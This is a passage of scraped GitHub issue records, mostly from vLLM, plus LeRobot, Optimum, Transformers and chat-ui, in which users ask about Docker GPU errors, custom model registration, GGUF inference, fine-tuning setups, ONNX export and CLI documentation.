\n\nI also tried adding the flags `--runtime nvidia --gpus all` per [this instruction](https://docs.vllm.ai/en/v0.8.4/deployment/docker.html) but got the error that `Error response from daemon: unknown or invalid runtime name: nvidia.`\n\nIf someone can shed the light of where vllm official Docker image looks for CUDA stuff, it will be greatly appreciated. Thanks in advance. \n\nThe complete command and error: \n```\n$ docker run -v ~/.cache/huggingface:/root/.cache/huggingface --env \"HUGGING_FACE_HUB_TOKEN=\" -p 8010:8000 --ipc=host vllm/vllm-openai:latest --model mistralai/Mistral-7B-v0.1\nINFO 10-21 08:13:18 [__init__.py:220] No platform detected, vLLM is running on UnspecifiedPlatform\nWARNING 10-21 08:13:23 [_custom_ops.py:20] Failed to import from vllm._C with ImportError('libcuda.so.1: cannot open shared object file: No such file or directory')\nTraceback (most recent call last):\n File \"\", line 198, in _run_module_as_main\n File \"\", line 88, in _run_code\n File \"/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/api_server.py\", line 1949, in \n parser = make_arg_parser(parser)\n ^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/cli_args.py\", line 263, in make_arg_parser\n parser = AsyncEngineArgs.add_cli_args(parser)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 1714, in add_cli_args\n parser = EngineArgs.add_cli_args(parser)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 919, in add_cli_args\n vllm_kwargs = get_kwargs(VllmConfig)\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 281, in get_kwargs\n return copy.deepcopy(_compute_kwargs(cls))\n ^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 182, in _compute_kwargs\n default = field.default_factory()\n ^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/pydantic/_internal/_dataclasses.py\", line 123, in __init__\n s.__pydantic_validator__.validate_python(ArgsKwargs(args, kwargs), self_instance=s)\n File \"/usr/local/lib/python3.12/dist-packages/vllm/config/device.py\", line 58, in __post_init__\n raise RuntimeError(\nRuntimeError: Failed to infer device type, please set the environment variable `VLLM_LOGGING_LEVEL=DEBUG` to turn on verbose logging to help debug the issue.\n```\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27268", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-21T15:24:21Z", "updated_at": "2025-10-21T15:24:21Z", "comments": 0, "user": "forrestbao" }, { "repo": "vllm-project/vllm", "number": 27265, "title": "[Usage]: Cannot register custom model (Out-of-Tree Model Integration)", "body": "```\n### Your current environment\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flake8==7.1.1\n[pip3] flashinfer==0.1.6+cu124torch2.4\n[pip3] flashinfer-python==0.2.5\n[pip3] mypy-extensions==1.0.0\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.4.5.8\n[pip3] nvidia-cuda-cupti-cu12==12.4.127\n[pip3] 
nvidia-cuda-nvrtc-cu12==12.4.127\n[pip3] nvidia-cuda-runtime-cu12==12.4.127\n[pip3] nvidia-cudnn-cu12==9.1.0.70\n[pip3] nvidia-cufft-cu12==11.2.1.3\n[pip3] nvidia-curand-cu12==10.3.5.147\n[pip3] nvidia-cusolver-cu12==11.6.1.9\n[pip3] nvidia-cusparse-cu12==12.3.1.170\n[pip3] nvidia-cusparselt-cu12==0.6.2\n[pip3] nvidia-ml-py==12.560.30\n[pip3] nvidia-modelopt==0.31.0\n[pip3] nvidia-modelopt-core==0.31.0\n[pip3] nvidia-nccl-cu12==2.21.5\n[pip3] nvidia-nvjitlink-cu12==12.4.127\n[pip3] nvidia-nvtx-cu12==12.4.127\n[pip3] pynvml==12.0.0\n[pip3] pyzmq==26.2.0\n[pip3] sentence-transformers==3.3.1\n[pip3] torch==2.6.0\n[pip3] torch_memory_saver==0.0.6\n[pip3] torchao==0.9.0\n[pip3] torchaudio==2.6.0\n[pip3] torchdata==0.11.0\n[pip3] torchprofile==0.0.4\n[pip3] torchtext==0.18.0\n[pip3] torchvision==0.21.0\n[pip3] transformer_engine_torch==2.3.0\n[pip3] transformers==4.51.1\n[pip3] triton==3.2.0\n[conda] flashinfer 0.1.6+cu124torch2.4 pypi_0 pypi\n[conda] flashinfer-python 0.2.5 pypi_0 pypi\n[conda] numpy 1.26.4 pypi_0 pypi\n[conda] nvidia-cublas-cu12 12.4.5.8 pypi_0 pypi\n[conda] nvidia-cuda-cupti-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-cuda-nvrtc-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-cuda-runtime-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-cudnn-cu12 9.1.0.70 pypi_0 pypi\n[conda] nvidia-cufft-cu12 11.2.1.3 pypi_0 pypi\n[conda] nvidia-curand-cu12 10.3.5.147 pypi_0 pypi\n[conda] nvidia-cusolver-cu12 11.6.1.9 pypi_0 pypi\n[conda] nvidia-cusparse-cu12 12.3.1.170 pypi_0 pypi\n[conda] nvidia-cusparselt-cu12 0.6.2 pypi_0 pypi\n[conda] nvidia-ml-py 12.560.30 pypi_0 pypi\n[conda] nvidia-modelopt 0.31.0 pypi_0 pypi\n[conda] nvidia-modelopt-core 0.31.0 pypi_0 pypi\n[conda] nvidia-nccl-cu12 2.21.5 pypi_0 pypi\n[conda] nvidia-nvjitlink-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-nvtx-cu12 12.4.127 pypi_0 pypi\n[conda] pynvml 12.0.0 pypi_0 pypi\n[conda] pyzmq 26.2.0 pypi_0 pypi\n[conda] sentence-transformers 3.3.1 pypi_0 pypi\n[conda] torch 2.6.0 pypi_0 pypi\n[conda] torch-memory-saver 0.0.6 pypi_0 pypi\n[conda] torchao 0.9.0 pypi_0 pypi\n[conda] torchaudio 2.6.0 pypi_0 pypi\n[conda] torchdata 0.11.0 pypi_0 pypi\n[conda] torchprofile 0.0.4 pypi_0 pypi\n[conda] torchtext 0.18.0 pypi_0 pypi\n[conda] torchvision 0.21.0 pypi_0 pypi\n[conda] transformer-engine-torch 2.3.0 pypi_0 pypi\n[conda] transformers 4.51.1 pypi_0 pypi\n[conda] triton 3.2.0 pypi_0 pypi\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.8.5.post1\n```\n\n# How would you like to use vllm\n\nHi, I'm trying to integrate a custom multi-modal model (Qwen2_5_VLForConditionalGeneration_Vilavt) using the out-of-tree plugin system, following the official documentation and the vllm_add_dummy_model example.\n\n### The Issue:\n\nThe model loading behavior is inconsistent between single-GPU and multi-GPU (tensor parallel) modes:\n\n- Single-GPU (CUDA_VISIBLE_DEVICES=0): Everything works perfectly. The engine initializes, and I can run inference.\n- Multi-GPU (CUDA_VISIBLE_DEVICES=0,1,2,3): The engine fails to start. 
Although the logs from VllmWorker processes show that my custom model is successfully registered, the main EngineCore process throws a ValueError, complaining that the model cannot be found.\n\nI've successfully created a package `vllm_vilavt`, installed it with `pip install -e .`, and my `setup.py` correctly points to a register() function in the entry_points.\n\n\nMy `setup.py`:\n```\nfrom setuptools import setup, find_packages\n\nsetup(\n name=\"vllm_vilavt\",\n version=\"0.1\",\n packages=find_packages(),\n entry_points={\n \"vllm.general_plugins\":\n [\"register_vilavt_model = vllm_", "url": "https://github.com/vllm-project/vllm/issues/27265", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-21T14:17:17Z", "updated_at": "2025-10-25T13:19:40Z", "comments": 1, "user": "Hyperwjf" }, { "repo": "vllm-project/vllm", "number": 27263, "title": "[Responses API] Support tool calling and output token streaming", "body": "Splitting off from #14721\n\n> FYI a start has been made here https://github.com/vllm-project/vllm/pull/20504\n> \n> That PR (which was merged to `main` on [7/9/2025](https://github.com/vllm-project/vllm/pull/20504#event-18495144925)) explicitly has unchecked boxes for\n> \n> * [ ] Tool/functional calling support\n> * [ ] Output token streaming\n> \n> Any plans to implement those features? I think that is what is needed to support agentic coding tools like codex. See:\n> \n> * https://docs.vllm.ai/projects/recipes/en/latest/OpenAI/GPT-OSS.html#harmony-format-support \n\n _Originally posted by @bartlettroscoe in [#14721](https://github.com/vllm-project/vllm/issues/14721#issuecomment-3321963360)_", "url": "https://github.com/vllm-project/vllm/issues/27263", "state": "open", "labels": [], "created_at": "2025-10-21T12:36:44Z", "updated_at": "2025-12-07T01:06:46Z", "comments": 4, "user": "markmc" }, { "repo": "vllm-project/vllm", "number": 27252, "title": "[Usage]: Does the \u201d@app.post(\"/generate\")\u201c API support qwen2_vl or not?", "body": "### Your current environment\n\nI want to know whether the \u201d@app.post(\"/generate\")\u201c API supports qwen2_vl or not.\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27252", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-21T07:30:11Z", "updated_at": "2025-10-21T07:30:11Z", "comments": 0, "user": "wwkww" }, { "repo": "huggingface/lerobot", "number": 2269, "title": "how to configure pi0_base to train with single camera dataset", "body": "\n\nHi,\nI'm trying to train pi0_base with the \"lerobot/aloha_sim_transfer_cube_human\" dataset, which has only one camera input, \"observation.images.top\". However, pi0 seems to expect three camera inputs:\n\"observation.images.base_0_rgb\",\n\"observation.images.left_wrist_0_rgb\",\n\"observation.images.right_wrist_0_rgb\"\n\n\"ValueError: All image features are missing from the batch. At least one expected. 
(batch: dict_keys(['action', 'next.reward', 'next.done', 'next.truncated', 'info', 'action_is_pad', 'task', 'index', 'task_index', 'observation.images.top', 'observation.state', 'observation.language.tokens', 'observation.language.attention_mask'])) (image_features: {'observation.images.base_0_rgb': PolicyFeature(type=, shape=(3, 224, 224)), 'observation.images.left_wrist_0_rgb': PolicyFeature(type=, shape=(3, 224, 224)), 'observation.images.right_wrist_0_rgb': PolicyFeature(type=, shape=(3, 224, 224))}) Exception in thread Thread-2 (_pin_memory_loop): Traceback (most recent call last): File \"/root/.local/share/mamba/envs/lerobot/lib/python3.10/threading.py\", line 1016, in _bootstrap_inner\"\n\nIs there a command-line argument I can use to set the single camera input to train with the pi0_base model?\n", "url": "https://github.com/huggingface/lerobot/issues/2269", "state": "open", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-10-21T01:32:50Z", "updated_at": "2025-10-21T17:36:17Z", "user": "dalishi" }, { "repo": "vllm-project/vllm", "number": 27233, "title": "gguf run good", "body": "### Your current environment\n\nfrom vllm import LLM, SamplingParams\n\ngguf_path = \"/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf\"\n\nllm = LLM(\n gguf_path,\n tokenizer=\"Qwen/Qwen3-1.7B\"\n)\n\nparams = SamplingParams(\n temperature=0.8,\n top_p=0.9,\n top_k=40,\n max_tokens=200,\n)\n\noutputs = llm.generate([\"Who is Napoleon Bonaparte?\"], params)\nprint(outputs[0].outputs[0].text)\n\n\n### How would you like to use vllm\n\nI want to run inferevenv) m@m-HP-Z440-Workstation:~/Desktop/vllm/vllm/examples/offline_inference/basic$ \n(venv) m@m-HP-Z440-Workstation:~/Desktop/vllm/vllm/examples/offline_inference/basic$ python3\nPython 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> \n>>> from vllm import LLM, SamplingParams\nINFO 10-21 03:05:39 [__init__.py:216] Automatically detected platform cuda.\n>>> \n>>> gguf_path = \"/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf\"\n>>> \n>>> llm = LLM(\n... gguf_path,\n... tokenizer=\"Qwen/Qwen3-1.7B\"\n... )\nINFO 10-21 03:05:41 [utils.py:233] non-default args: {'tokenizer': 'Qwen/Qwen3-1.7B', 'disable_log_stats': True, 'model': '/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf'}\nINFO 10-21 03:06:14 [model.py:547] Resolved architecture: Qwen3ForCausalLM\n`torch_dtype` is deprecated! Use `dtype` instead!\nERROR 10-21 03:06:14 [config.py:278] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf'. Use `repo_type` argument if needed., retrying 1 of 2\nERROR 10-21 03:06:16 [config.py:276] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf'. 
Use `repo_type` argument if needed.\nINFO 10-21 03:06:16 [model.py:1730] Downcasting torch.float32 to torch.bfloat16.\nINFO 10-21 03:06:16 [model.py:1510] Using max model len 32768\nINFO 10-21 03:06:16 [scheduler.py:205] Chunked prefill is enabled with max_num_batched_tokens=8192.\n(EngineCore_DP0 pid=67528) INFO 10-21 03:06:41 [core.py:644] Waiting for init message from front-end.\n(EngineCore_DP0 pid=67528) INFO 10-21 03:06:41 [core.py:77] Initializing a V1 LLM engine (v0.11.0) with config: model='/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf', speculative_config=None, tokenizer='Qwen/Qwen3-1.7B', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=32768, download_dir=None, load_format=gguf, tensor_parallel_size=1, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=gguf, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser=''), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None), seed=0, served_model_name=/home/m/Desktop/vllm/vllm/examples/offline_inference/basic/Qwen3-1.7B-GGUF/Qwen3-1.7B-Q6_K.gguf, enable_prefix_caching=True, chunked_prefill_enabled=True, pooler_config=None, compilation_config={\"level\":3,\"debug_dump_path\":\"\",\"cache_dir\":\"\",\"backend\":\"\",\"custom_ops\":[],\"splitting_ops\":[\"vllm.unified_attention\",\"vllm.unified_attention_with_output\",\"vllm.mamba_mixer2\",\"vllm.mamba_mixer\",\"vllm.short_conv\",\"vllm.linear_attention\",\"vllm.plamo2_mamba_mixer\",\"vllm.gdn_attention\",\"vllm.sparse_attn_indexer\"],\"use_inductor\":true,\"compile_sizes\":[],\"inductor_compile_config\":{\"enable_auto_functionalized_v2\":false},\"inductor_passes\":{},\"cudagraph_mode\":[2,1],\"use_cudagraph\":true,\"cudagraph_num_of_warmups\":1,\"cudagraph_capture_sizes\":[512,504,496,488,480,472,464,456,448,440,432,424,416,408,400,392,384,376,368,360,352,344,336,328,320,312,304,296,288,280,272,264,256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48,40,32,24,16,8,4,2,1],\"cudagraph_copy_inputs\":false,\"full_cuda_graph\":false,\"use_inductor_graph_partition\":false,\"pass_config\":{},\"max_capture_size\":512,\"local_cache_dir\":null}\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. Expected number of connected peer ranks is : 0\n[Gloo] Rank 0 is connected to 0 peer ranks. 
Ex", "url": "https://github.com/vllm-project/vllm/issues/27233", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-21T00:11:26Z", "updated_at": "2025-10-22T00:44:10Z", "comments": 12, "user": "kmnnmk212-source" }, { "repo": "vllm-project/vllm", "number": 27228, "title": "[Installation]: Compatibility with PyTorch 2.9.0?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How you are installing vllm\n\nIs there a version of vllm that is compatible with the latest PyTorch release 2.9.0?\n\n```\npip install vllm==0.11.0\npip install torch==2.9.0\n```\n\n```\n$ vllm bench latency --input-len 256 --output-len 256 --model Qwen3/Qwen3-8B --batch-size 1\nterminate called after throwing an instance of 'std::bad_alloc'\n what(): std::bad_alloc\nAborted (core dumped)\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27228", "state": "closed", "labels": [ "installation" ], "created_at": "2025-10-20T21:10:24Z", "updated_at": "2025-10-21T22:40:15Z", "comments": 3, "user": "andrewor14" }, { "repo": "vllm-project/vllm", "number": 27208, "title": "[Feature]: Upgrade CUDA version to 12.9.1 in docker images", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe current builds display warning logs like these\n```\nWarning: please use at least NVCC 12.9 for the best DeepGEMM performance\n```\n\nCan we bump this version easily?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27208", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-20T16:08:49Z", "updated_at": "2025-10-21T21:20:19Z", "comments": 1, "user": "jhuntbach-bc" }, { "repo": "huggingface/lerobot", "number": 2259, "title": "Clarifications on fine-tuning on different envs and embodiments", "body": "Hi everyone,\nI\u2019m currently working on fine-tuning SmolVLA and \u03c0\u2080 using **[RLBench](https://github.com/stepjam/RLBench)**. The robot setup is a Franka Emika Panda (7DoF + gripper), and I\u2019ve already collected custom LeRobot datasets for a pick-and-place task ([available on my Hugging Face](https://huggingface.co/RonPlusSign)) with 500 demo episodes.\n\nI\u2019ve successfully fine-tuned [OpenVLA](https://github.com/openvla/openvla) using its official repository, where the action space is defined as \u0394EEF pose (Euler rotation) + gripper, and the state as \u0394EEF pose (quaternion rotation) + gripper, using a single observation image (left shoulder), reaching around 22% success rate.\n\nHowever, when trying to fine-tune SmolVLA, despite the training running without issues (loss converges and wandb plots look fine), the evaluation yields 0% success. 
I suspect I\u2019m misunderstanding how to correctly define the state and action spaces for SmolVLA in this context.\nSince RLBench is not one of the officially supported envs, I created an evaluation script (you can find it [here](https://github.com/RonPlusSign/RLBench/blob/master/test_smolvla.py)), similar to the examples provided in [Robot Learning: A Tutorial](https://github.com/fracapuano/robot-learning-tutorial/blob/main/snippets/ch5/02_using_smolvla.py) (thanks @fracapuano for the amazing work!).\n\n\"Image\"\n\nFor example, I started the finetuning using:\n```sh\npython src/lerobot/scripts/lerobot_train.py \\\n --policy.path=HuggingFaceVLA/smolvla_libero \\\n --policy.repo_id=RonPlusSign/smolvla_PutRubbishInBin \\\n --dataset.repo_id=RonPlusSign/RLBench-LeRobot-v3-PutRubbishInBin \\\n --batch_size=32 \\\n --output_dir=outputs/train/smolvla_finetuned_rubbish \\\n --policy.device=cuda \\\n --wandb.enable=true \\\n --save_freq=10000 \\\n --steps=60000\n```\n\nI also tested smaller finetunings (e.g. 5k, 10k, 20k steps).\n\nHere are some specific points I\u2019d like to clarify:\n\n1. What are the exact action and state spaces used in SmolVLA and \u03c0\u2080 pretraining? (\u0394EEF pose, absolute EEF pose, joint positions, joint velocities, ... and angle representations e.g. quaternion or Euler).\n\n2. Regarding camera inputs: does the naming or number of cameras affect the model performance? Should I stick to the _exact_ names provided in the `config.json` file, such as `observation.images.image` and `observation.images.image2` (front/wrist), similar to pretraining? Or is it fine to use different camera names and/or add extra views? Is there a way to override the existing input and output features or this means that the pretrain would be wasted?\n\n3. The base model [lerobot/smolvla_base](https://huggingface.co/lerobot/smolvla_base) is pretrained on the SO100/SO101 robot, so I assume it might not transfer well to Franka Panda tasks \u2014 is that correct?\n\n4. Would it make more sense to start from a model trained on Franka, e.g. [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero), or it's still a different type of embodiment (it seems with 6DoF+gripper, which is not my case)?\n\n5. Are the datasets [HuggingFaceVLA/libero](https://huggingface.co/datasets/HuggingFaceVLA/libero) and/or [HuggingFaceVLA/smol-libero](https://huggingface.co/datasets/HuggingFaceVLA/smol-libero) the ones used for pretraining [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero)?\n\n6. In [HuggingFaceVLA/smol-libero](https://huggingface.co/datasets/HuggingFaceVLA/smol-libero) the actions have dimension 7, which doesn\u2019t clearly map to 7 joint angles + gripper. Are these absolute joint positions, EEF poses, or something else? Does LIBERO use a 6DoF or 7DoF Franka setup? 
If 6DoF, which joint is excluded?\n\nAny guidance on these points (or pointers to where this information is documented) would be very helpful \u2014 I\u2019ve been trying to align my setup with the pretrained models but haven\u2019t found clear references for these details.\n\nThanks a lot for your time and for maintaining this project!", "url": "https://github.com/huggingface/lerobot/issues/2259", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-10-20T13:24:22Z", "updated_at": "2025-12-23T10:37:31Z", "user": "RonPlusSign" }, { "repo": "vllm-project/vllm", "number": 27184, "title": "[Doc]: Multi-Modal Benchmark is too simple", "body": "### \ud83d\udcda The doc issue\n\nThe latest doc about the Multi-Modal Benchmark shows:\n1. download sharegpt4v_instruct_gpt4-vision_cap100k.json and COCO's 2017 Train images\n2. vllm serve and vllm bench serve\nBut there are many more details to take care of:\n1. delete every entry that is not COCO's from sharegpt4v_instruct_gpt4-vision_cap100k.json\n2. place COCO's 2017 Train images in the /root directory, like /train2017/,\n3. vllm serve --allowed-local-media-path /train2017/ , because vllm uses the condition:\n```\nif allowed_local_media_path not in filepath.resolve().parents\n```\n the ` filepath.resolve().parents` is [\"/train2017\", \"/\"], so the easiest way is to place the images in /train2017/ and set `--allowed-local-media-path /train2017/`\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27184", "state": "open", "labels": [ "documentation" ], "created_at": "2025-10-20T06:24:18Z", "updated_at": "2025-10-20T16:44:17Z", "comments": 2, "user": "BigFaceBoy" }, { "repo": "vllm-project/vllm", "number": 27182, "title": "[Feature]: INT8 Support in Blackwell Arch", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nHello, I want to use w8a8 (int8) on Blackwell GPUs, and when I read the source code, it says that int8 is not supported by sm120. According to the NVIDIA PTX instructions, Blackwell-series GPUs still have int8 tensor core support, so is there another way to use w8a8 int8 on an RTX 5090 with vLLM now? \n\"Image\" \n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27182", "state": "open", "labels": [ "feature request" ], "created_at": "2025-10-20T06:04:03Z", "updated_at": "2025-10-20T06:04:03Z", "comments": 0, "user": "nhanngoc94245" }, { "repo": "huggingface/optimum", "number": 2376, "title": "Support qwen2_5_vl for ONNX export", "body": "### Feature request\n\nI would like to be able to convert [this model](https://huggingface.co/prithivMLmods/DeepCaption-VLA-V2.0-7B), which is based on the Qwen 2.5 VL architecture, using optimum. 
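Roughly what I ran (the output directory name is arbitrary):\n```\noptimum-cli export onnx --model prithivMLmods/DeepCaption-VLA-V2.0-7B qwen2_5_vl_onnx/\n```\n\n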
Right now, I get the error:\n\n```\nValueError: Trying to export a qwen2_5_vl model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type qwen2_5_vl to be supported natively in the ONNX export.\n```\n\nI read the documentation but I have no idea how I'd go about setting the custom onnx config up.\n\n### Motivation\n\nQwen 2.5 VL is a SOTA architecture that is already being used in downstream models (see my example), so it is worth supporting.\n\n### Your contribution\n\nI can do research but I don't have enough experience with this codebase and ML code to contribute a PR.", "url": "https://github.com/huggingface/optimum/issues/2376", "state": "open", "labels": [], "created_at": "2025-10-19T22:08:28Z", "updated_at": "2026-01-06T08:03:39Z", "comments": 8, "user": "ayan4m1" }, { "repo": "huggingface/transformers", "number": 41731, "title": "transformers CLI documentation issue", "body": "### System Info\n\n- `transformers` version: 5.0.0.dev0\n- Platform: Linux-6.6.87.2-microsoft-standard-WSL2-x86_64-with-glibc2.39\n- Python version: 3.12.9\n- Huggingface_hub version: 1.0.0.rc6\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Using distributed or parallel set-up in script?: no\n- Using GPU in script?: yes\n- GPU type: NVIDIA GeForce RTX 3050 Laptop GPU\n\n### Who can help?\n\n@stevhliu \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] Update the documentation for the transformers-cli\n- [ ] Set the default --format flag to \"pipe\" in place of \"infer\" \n\n### Reproduction\n\necho -e \"Plants create [MASK] through a process known as photosynthesis.\" | transformers run --task fill-mask --model google-bert/bert-base-uncased --device 0\n\n(as shown in the documentation)\n\n\n**Output:**\n\n\"Image\"\n\n\n\n### Expected behavior\n\n\n**Output:**\n\n\"Image\"\n\n\n\n**Fix/updated command:**\n\n echo -e \"Plants create [MASK] through a process known as photosynthesis.\" | transformers run fill-mask --model google-bert/bert-base-uncased --device 0 --format pipe\n\nThis indicates the current working format is:\n\ntransformers run --model --format [options]\n\n**Update**\n\nWe could let the default --format flag be \"pipe\" instead of \"infer\", which is deprecated, so we could also write the command as follows for most models:\n \ntransformers run --model \n\n\n**Action Needed:** (documentation change) \n\nAll documentation for similar models should be updated for the transformers CLI inference. \n\nI would like to confirm if my understanding is correct: should I go ahead and raise a PR to update the documentation and set the default as \"pipe\" for the --format flag? 
I am relatively new to open source and would greatly appreciate any guidance or tips you could provide to ensure my contribution is appropriate and follows best practices.\n\n\n\n\n\n\n\n\n", "url": "https://github.com/huggingface/transformers/issues/41731", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-19T09:31:46Z", "updated_at": "2025-12-22T08:03:09Z", "comments": 14, "user": "ArjunPimpale" }, { "repo": "huggingface/chat-ui", "number": 1947, "title": "HuggingChat MoM (Mixture-of-Models) Integration Proposal \ud83e\udd17", "body": "# **HuggingChat MoM (Mixture-of-Models) Integration Proposal \ud83e\udd17**\n\n**Status:** Proposal \n**Date:** 2025-10-19 \n**Version:** 1.0\n**Authors**: vLLM-SR Team\n\n---\n\n## Executive Summary\n\nThis proposal outlines the integration of **vLLM Semantic Router** into HuggingChat as a new **MoM (Mixture-of-Models)** routing option. The integration will enable advanced intelligent routing capabilities including semantic caching, PII detection, and chain-of-thought (CoT) transparency, while maintaining full backward compatibility with the existing Omni (Arch router) implementation.\n\n---\n\n## 1. Motivation\n\n### Current State\n\n- HuggingChat currently supports **Omni** routing via the Arch router (`src/lib/server/router/arch.ts`)\n- Arch router provides basic route selection using LLM-based decision-making\n- Limited visibility into routing decisions and no semantic caching capabilities\n\n### Desired State\n\n- Support **MoM (Mixture-of-Models)** routing via vLLM Semantic Router\n- Enable advanced features: semantic caching, PII detection, intelligent routing\n- Provide transparent chain-of-thought (CoT) information for routing decisions\n- Maintain coexistence of both Omni and MoM routers for gradual rollout\n\n### Business Value\n\n1. **Performance**: Semantic caching reduces latency for repeated queries\n2. **Security**: PII detection protects user privacy\n3. **Transparency**: CoT information builds user trust\n4. **Flexibility**: Users can choose between Omni and MoM routing strategies\n5. 
